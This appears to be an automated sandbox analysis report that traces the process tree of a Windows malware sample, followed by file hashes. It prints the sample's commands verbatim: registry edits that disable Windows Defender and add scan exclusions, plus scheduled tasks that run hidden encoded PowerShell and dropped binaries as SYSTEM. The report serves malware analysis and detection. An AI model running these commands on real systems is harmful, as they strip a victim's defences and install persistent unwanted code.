\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1356
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1576
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:604 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1372
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1136
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcHqGNSEh" /SC once /ST 13:36:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcHqGNSEh"4⤵PID:1232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcHqGNSEh"4⤵PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOpYYSCMwzPLWKHDoz" /SC once /ST 18:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW\OomKHAnYBQcvKjU\pbyhPXw.exe\" WN /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:996
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8954378B-5E44-47BF-9D1B-7C52783C25B6} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]1⤵PID:2008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1632
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1804
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1944
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2032
-
C:\Windows\system32\taskeng.exetaskeng.exe {6A3C6711-5B62-4562-9D75-36F7991A8FB7} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1376
-
C:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW\OomKHAnYBQcvKjU\pbyhPXw.exeC:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW\OomKHAnYBQcvKjU\pbyhPXw.exe WN /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1316 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIThzLYFF" /SC once /ST 09:04:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gIThzLYFF"3⤵PID:1416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIThzLYFF"3⤵PID:668
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1984
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:772
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:748
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKVkwEfPc" /SC once /ST 15:43:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKVkwEfPc"3⤵PID:432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKVkwEfPc"3⤵PID:1264
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:323⤵PID:2036
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:643⤵PID:1992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:323⤵PID:560
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:324⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:643⤵PID:376
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:644⤵PID:748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\cvZcJATGqkXfIUHO\GEhHJqKS\UwVUjOAUgOpnKlYd.wsf"3⤵PID:1792
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\cvZcJATGqkXfIUHO\GEhHJqKS\UwVUjOAUgOpnKlYd.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1612 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AuXcnpONU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AuXcnpONU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUOXbSmazbUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUOXbSmazbUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hDIhVTokUCGYfCBroAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hDIhVTokUCGYfCBroAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lWVaGBLuxBBU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lWVaGBLuxBBU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lhYzWsVecTGPC" /t REG_DWORD /d 0 /reg:324⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lhYzWsVecTGPC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHwbcuUAwGaxxLVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHwbcuUAwGaxxLVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:644⤵PID:1860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AuXcnpONU" /t REG_DWORD /d 0 /reg:324⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AuXcnpONU" /t REG_DWORD /d 0 /reg:644⤵PID:1908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUOXbSmazbUn" /t REG_DWORD /d 0 /reg:324⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUOXbSmazbUn" /t REG_DWORD /d 0 /reg:644⤵PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hDIhVTokUCGYfCBroAR" /t REG_DWORD /d 0 /reg:324⤵PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hDIhVTokUCGYfCBroAR" /t REG_DWORD /d 0 /reg:644⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lWVaGBLuxBBU2" /t REG_DWORD /d 0 /reg:324⤵PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lWVaGBLuxBBU2" /t REG_DWORD /d 0 /reg:644⤵PID:1064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lhYzWsVecTGPC" /t REG_DWORD /d 0 /reg:324⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lhYzWsVecTGPC" /t REG_DWORD /d 0 /reg:644⤵PID:628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHwbcuUAwGaxxLVB" /t REG_DWORD /d 0 /reg:644⤵PID:376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHwbcuUAwGaxxLVB" /t REG_DWORD /d 0 /reg:324⤵PID:1452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW" /t REG_DWORD /d 0 /reg:324⤵PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW" /t REG_DWORD /d 0 /reg:644⤵PID:1192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:324⤵PID:1644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cvZcJATGqkXfIUHO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1860
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdkcRbmSc" /SC once /ST 06:30:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdkcRbmSc"3⤵PID:1568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdkcRbmSc"3⤵PID:1924
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:884
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:560
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1716
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hxeYasCLbRnJIWdMY" /SC once /ST 09:37:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\cvZcJATGqkXfIUHO\xTYckODbPiApVAh\xCUpelI.exe\" ti /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hxeYasCLbRnJIWdMY"3⤵PID:1416
-
-
-
C:\Windows\Temp\cvZcJATGqkXfIUHO\xTYckODbPiApVAh\xCUpelI.exeC:\Windows\Temp\cvZcJATGqkXfIUHO\xTYckODbPiApVAh\xCUpelI.exe ti /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:924 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bOpYYSCMwzPLWKHDoz"3⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1728
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1752
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1060
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AuXcnpONU\WLDyBj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "auXiRxufxTTOyhH" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "auXiRxufxTTOyhH2" /F /xml "C:\Program Files (x86)\AuXcnpONU\WsyoIhi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "auXiRxufxTTOyhH"3⤵PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "auXiRxufxTTOyhH"3⤵PID:1488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YlxsTzeWXLRaoS" /F /xml "C:\Program Files (x86)\lWVaGBLuxBBU2\HeIdmXj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HHUqnHvDzVdEU2" /F /xml "C:\ProgramData\fHwbcuUAwGaxxLVB\UrQGZPk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YxhrdthUWrTNhubJj2" /F /xml "C:\Program Files (x86)\hDIhVTokUCGYfCBroAR\UmwSADi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "REfHdSpYxhZoYqNHDxO2" /F /xml "C:\Program Files (x86)\lhYzWsVecTGPC\HnXQFwV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZHJIBrVaUMWRPxknL" /SC once /ST 11:39:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\cvZcJATGqkXfIUHO\gCILoYye\raPzMBE.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZHJIBrVaUMWRPxknL"3⤵PID:1136
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:324
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1580
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1476
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hxeYasCLbRnJIWdMY"3⤵PID:296
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\cvZcJATGqkXfIUHO\gCILoYye\raPzMBE.dll",#1 /site_id 5254032⤵PID:1204
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\cvZcJATGqkXfIUHO\gCILoYye\raPzMBE.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZHJIBrVaUMWRPxknL"4⤵PID:1504
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1020
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1908
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1760
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b2abbfbf9f4734e33b5e2973da4f7f88
SHA1fd41875455e668686d99c99efe6c8b7b62434084
SHA2565cf7b6bc8ea7bcd493ff6e404119517e8e4d689e0140bcaf9add981b9d772b1e
SHA512a17733dce55fcfafeb76b1d4b8c3288944acf578b167ad434a173da5014f3ad987f6e546055ca92cd4a695fc4e5fbb9a278c2bb53e4acdaaede7fdf582a2caab
-
Filesize
2KB
MD5371aec793111964dd0c0dc6db1834ad3
SHA1c87d5247cc955a4959abdbc21ad4103975e0afcc
SHA256b12d17ed448bfcfc5c2fef8f6bb791e18da02ea17a2f4d35cde2bd2638710069
SHA5127192af9db9a59ab51273acf14f89f81e8434847f2dc3334f17a78ec8744764e949f9b6d165479e1a044cb8092f623a670f244f2c456c781d15970cdbea882886
-
Filesize
2KB
MD50ae3bf5dd8884e5395eaaedbc64add15
SHA1f5f2e0880fe58e0ec0f6ddef50bca2f80d78dd7e
SHA2568c7b58c43fc67d5c16b80fe1b34b556e1daae5f023ea0aa63766a2cd40fb822c
SHA51215cdf6661304b449bf23085b8c29f8f45fb26bcf5be9a0636eff11b77d3062af4d3bbfd2b987f7a4b924f35c99693d960ff338262694fdb5f615b14305784961
-
Filesize
2KB
MD528aed13cba5caeaec88b6248f0e29f6f
